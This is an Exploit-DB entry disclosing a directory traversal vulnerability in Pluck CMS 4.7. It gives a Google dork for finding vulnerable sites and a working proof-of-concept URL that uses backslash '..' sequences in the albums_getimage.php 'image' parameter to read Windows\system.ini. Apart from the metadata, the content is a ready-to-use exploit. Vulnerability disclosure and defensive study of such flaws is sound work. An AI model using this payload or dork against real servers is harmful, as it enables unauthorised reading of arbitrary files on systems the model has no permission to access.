Pluck CMS 4.7 - Directory Traversal

EDB-ID:

36986

CVE:



Author:

Wadeek

Type:

webapps


Platform:

PHP

Date:

2015-05-11


# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################